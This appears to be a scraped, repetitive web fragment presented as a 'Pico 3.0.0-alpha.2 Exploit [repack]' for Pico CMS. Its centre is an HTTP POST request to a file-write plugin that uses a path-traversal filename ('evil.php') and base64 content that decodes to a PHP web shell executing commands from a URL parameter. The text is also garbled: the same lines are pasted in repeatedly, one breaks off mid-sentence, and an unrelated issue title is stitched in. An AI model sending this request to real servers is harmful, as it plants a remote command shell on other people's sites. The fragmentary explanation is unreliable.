The preprocessor is "non-syntax-aware." By using specific character sequences, the attacker tricks the preprocessor into terminating the string early or failing to recognize it as a string during its "patching" phase.
PHP Fatal error: Unparenthesized · Issue #608 · picocms/Pico - GitHub
POST /admin/plugins/PicoFileWrite/ HTTP/1.1 Content-Disposition: form-data; name="file_path"; filename="../../plugins/evil.php" Content-Disposition: form-data; name="file_content"; base64,PD9waHAgZWNobyBTeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=
Pico 3.0.0-alpha.2 Exploit [repack]
The preprocessor is "non-syntax-aware." By using specific character sequences, the attacker tricks the preprocessor into terminating the string early or failing to recognize it as a string during its "patching" phase.
PHP Fatal error: Unparenthesized · Issue #608 · picocms/Pico - GitHub Pico 3.0.0-alpha.2 Exploit
POST /admin/plugins/PicoFileWrite/ HTTP/1.1 Content-Disposition: form-data; name="file_path"; filename="../../plugins/evil.php" Content-Disposition: form-data; name="file_content"; base64,PD9waHAgZWNobyBTeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4= The preprocessor is "non-syntax-aware